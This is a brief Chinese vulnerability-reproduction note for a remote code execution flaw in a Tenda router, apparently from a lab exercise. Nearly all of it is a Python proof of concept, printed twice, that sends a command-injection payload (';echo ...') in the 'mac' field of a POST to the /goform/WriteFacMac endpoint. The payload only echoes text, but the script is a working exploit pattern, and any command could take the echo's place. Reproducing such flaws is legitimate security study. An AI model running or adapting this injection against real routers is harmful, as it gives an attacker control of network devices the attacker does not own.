T8-2Tenda-路由器-RCE
漏洞复现:
payload:
import requests
ip = '192.168.74.145'
url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"
data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)
payload:
import requests
ip = '192.168.74.145'
url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"
data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)